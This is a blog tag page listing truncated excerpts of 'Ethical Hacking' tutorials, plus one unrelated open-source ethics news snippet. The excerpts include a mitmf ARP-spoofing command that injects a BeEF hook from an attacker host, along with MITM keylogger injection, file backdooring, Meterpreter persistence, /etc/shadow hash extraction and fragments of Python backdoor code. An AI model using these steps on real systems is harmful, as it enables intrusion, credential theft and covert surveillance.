首页 > TAG信息列表 > Ethical
Wireshark for Ethical Hackers - 4
Wireshark for Ethical Hackers - 4 Alfa Adapter is required which support wireless G/N. Parameter Value Chipset Realtek RTL8814AU WiFi Standards IEEE 802.11ac/a/b/g/n WiFi Frequency Dual Band 2.4GHz or 5GHz Antenna Connector RP-SMA female x 4Wireshark for Ethical Hackers - 2
Wireshark for Ethical Hackers - 2 Interface Overview Start Wireshark in Kali Linux. HTTP Image Extracting filter: image-jfif Show packet bytes / Export packet bytes HTTP Passwords Target website: http://uploaded.net/login filter: HTTP filter: urlencodEthical.Hacking.2021.10:PIVOTING AND PRIVILEGE ESCALATION(2)Extracting Password Hashes on Linux
Linux doesn’t store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the passwords in the file /etc/shadow. The permissions on the /etc/shadow/ file indicate that only the owner (root) and the group (shadow) can read the file, and that on新的开源组织成立:道德治理,人类自由大于软件自由
喜欢就关注我们吧! Hippocratic License( 一个加入了道德条款的开源许可证),以及第一个也是最流行的开源项目行为准则 — 贡献者公约(Contributor Covenant)的创建者 Coraline Ada Ehmke 宣布,成立一个新的非营利性开源组织:Ethical Source 组织(the Organization for Ethical Source,OES),以授Ethical Hacking - POST EXPLOITATION(2)
MAINTAINING ACCESS - Methods 1. Using a veil-evasion Rev_http_service Rev_tcp_service Use it instead of a normal backdoor. Or upload and execute from meterpreter. Does not always work. 2. Using persistence module run persistence -h Detectable by antiviEthical Hacking - GAINING ACCESS(23)
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hooEthical Hacking - GAINING ACCESS(18)
CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original(pdf, jpg, mp3) file to anEthical Hacking - GAINING ACCESS(6)
Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan restult - services: Scan resulst - Vulnerabilities: Scan result - credentials: Try to login the database usingEthical Hacking - GAINING ACCESS(3)
Sever side attacks code execution Let‘s analyze the Zenmap scan result first and search for something vulnerabilities about Samba smbd 3.x. We find the following vulnerability and try to use it. https://www.rapid7.com/db/modules/exploit/multi/samba/Ethical Hacking - NETWORK PENETRATION TESTING(23)
Detecting ARP Posionning Attacks ARP main security issues: 1. Each ARP requests/response is trusted. 2. Clients can accept responses even if they did not send a request. We can use the tool called Xarp(http://www.xarp.net/) to detect this kind attack.Ethical Hacking - NETWORK PENETRATION TESTING(21)
MITM - Code Injection Inject javascript or HTML code into pages. Code gets executed on target machine. Use - - inject plugin. Code can be: 1. Stored on a local file --js-file or --html-file 2. Stored online --js-url or --html-url 3. Or you can supply thEthical Hacking - NETWORK PENETRATION TESTING(20)
MITM - Capturing Screen Of Target & Injecting a Keylogger ScreenShotter Plugin: ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a clients browser --screen Load plugin 'ScreenShotter' --interval SECONDSEthical Hacking - NETWORK PENETRATION TESTING(11)
Securing your Network From the Above Attacks. Now that we know how to test the security of all known wireless encryption(WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks as we know all the weaknesses that can be used by haEthical Hacking - NETWORK PENETRATION TESTING(4)
Targeted packet sniffing airodump-ng --channel[channel] --bssid[bssid] --write[file-name][interface] Now all the data will be stored in the file name specified after the -write option. We can analyze this data using Wireshark. The only problem is that tPython Ethical Hacking - VULNERABILITY SCANNER(8)
Implementing Code To Discover XSS in Parameters 1. Watch the URL of the XSS reflected page carefully. 2. Add the test_xss_in_link method in the Scanner class. #!/usr/bin/env pythonimport requestsimport refrom bs4 import BeautifulSoupfrom urllib.pPython Ethical Hacking - VULNERABILITY SCANNER(7)
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to the web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check oPython Ethical Hacking - VULNERABILITY SCANNER(5)
EXPLOITATION - XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/StPython Ethical Hacking - VULNERABILITY SCANNER(3)
Polish the Python code using sending requests in a session Class Scanner. #!/usr/bin/env pythonimport requestsimport refrom urllib.parse import urljoinclass Scanner: def __init__(self, url, ignore_links): self.session = requests.Session()Python Ethical Hacking - VULNERABILITY SCANNER(2)
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check of thPython Ethical Hacking - WEB PENETRATION TESTING(4)
CRAWING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. Extract all links. 3. Repeat for each new link that is not already on the list. #!/usr/bin/env pythonimport reimport requestsfrom urllib.parse import urlPython Ethical Hacking - Malware Packaging(3)
Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whlPython Ethical Hacking - TROJANS Analysis(4)
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -Python Ethical Hacking - Persistence(2)
Polish the Python code by adding the become_persistent function. #!/usr/bin/env pythonimport jsonimport socketimport subprocessimport osimport base64import sysimport shutilclass Backdoor: def __init__(self, ip, port): self.become_persistent()Python Ethical Hacking - BACKDOORS(7)
Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: An incorrect command is sent. The correct command is miss-used. Listener: #!/usr/bin/env pythonimport socketimport jsonimport base64class Listener:Python Ethical Hacking - BACKDOORS(5)
File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read the file as a sequence of characters. 2. Send this sequence of characters. 3. Create a new empty file at the destination. 4. Store the transferred sequence